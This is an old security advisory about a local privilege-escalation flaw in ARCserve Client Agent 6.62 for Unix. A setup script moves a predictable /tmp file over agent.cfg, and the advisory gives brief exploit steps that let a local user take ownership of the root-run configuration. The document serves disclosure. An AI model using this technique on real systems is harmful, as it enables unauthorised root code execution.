COMMAND

    ARCserve

SYSTEMS AFFECTED

    Client Agent 6.62

PROBLEM

    'zorgon' found following.  He discovered a vulnerability in Client
    Agent 6.62 for Unix.   It was tested on  a Debian 2.2.14.   Client
    Agent has  a hole  allowing to  execute an  arbitrary code by root
    without  its  knowing.   In  the  meantime,  some  conditions  are
    necessary to exploit this vulnerability.

    Client Agent is used with ARCserveIT, the safe software.  It  must
    be installed on all the workstations.  A global configuration file
    agent.cfg keeps every sub-agents  installed on your system.   This
    file is in  /usr/CYEagent, and receives  the information from  the
    sub-agent when the script /opt/uagent/uagensetup is ran.

    uagent.cfg:

        debian:/usr/CYEagent# more agent.cfg
        #
        #(c) Copyright 1989-1999 Computer Associates International, Inc.
        #and/or its subsidiaries. All Rights Reserved. Use by the United
        #States Government is subject to RESTRICTED RIGHTS as set out in
        #the license agreement.
        #
        
        [0]
        #[UAGENT]
        NAME    Uagent
        VERSION 5.0.0
        HOME    /opt/uagent
        #ENV     CHEY_ENV_DEBUG_LEVEL=4
        ENV     LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
        ENV     SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
        ENV     LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
        BROWSER asbr
        AGENT   uagentd
        MERGE   umrgd
        VERIFY  umrgd

    where asbr, uagentd, and umgrd are programms in /opt/uagent.

    Client Agent  is vulnerable  only if  uagentsetup is  run a second
    time.   The first  time, it  creates the  folder /usr/CYEagent and
    the file  agent.cfg, but  after it  creates a  backup of agent.cfg
    and creates  a new  agent.cfg without  checking permissions.   The
    code in /opt/uagent/uagentsetup:

        # append lines
        #
        case $ANS in
          y|Y|yes|YES|Yes)
                cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
                ${ECHO} >> ${TMPFILE} || exit 2
                mv ${TMPFILE} $dest || exit 2      <------------
                ;;
        esac

    So anyone can control this  file.  The modifications to  this file
    will be used when the sub-agent will be stopped and restarted.

    Exploit:

        [zorgon@debian /]$ cd /tmp
        [zorgon@debian /tmp]$ touch uagent.tmp
        [zorgon@debian /tmp]$ chmod 700 uagent.tmp

    If uagentsetup is run a second time:

        [zorgon@debian /]$ ls -lag /usr/CYEagent/
        total 176
        drwxr-xr-x    3 root     root         4096 Jul 19 17:46 .
        drwxr-xr-x   15 root     root         4096 Jul 11 10:37 ..
        -rw-r--r--    1 zorgon   users         618 Jul 19 17:47 agent.cfg
        -rw-r--r--    1 root     root          618 Jul 19 17:47 agent.cfg.old
        -rwxr-xr-x    1 root     root        16899 Jul 11 10:37 asagent
        -rwxr-xr-x    1 root     root       105280 Jul 11 10:37 asagentd
        lrwxrwxrwx    1 root     root           11 Jul 12 10:54 li -> /usr/lib/li
        -rwxr-xr-x    1 root     root        27878 Jul 19 17:47 libarclic98_api.so
        drwxr-xr-x    3 root     root         4096 Jul 11 10:37 nls
        [zorgon@debian /]$

SOLUTION

    Nothing yet.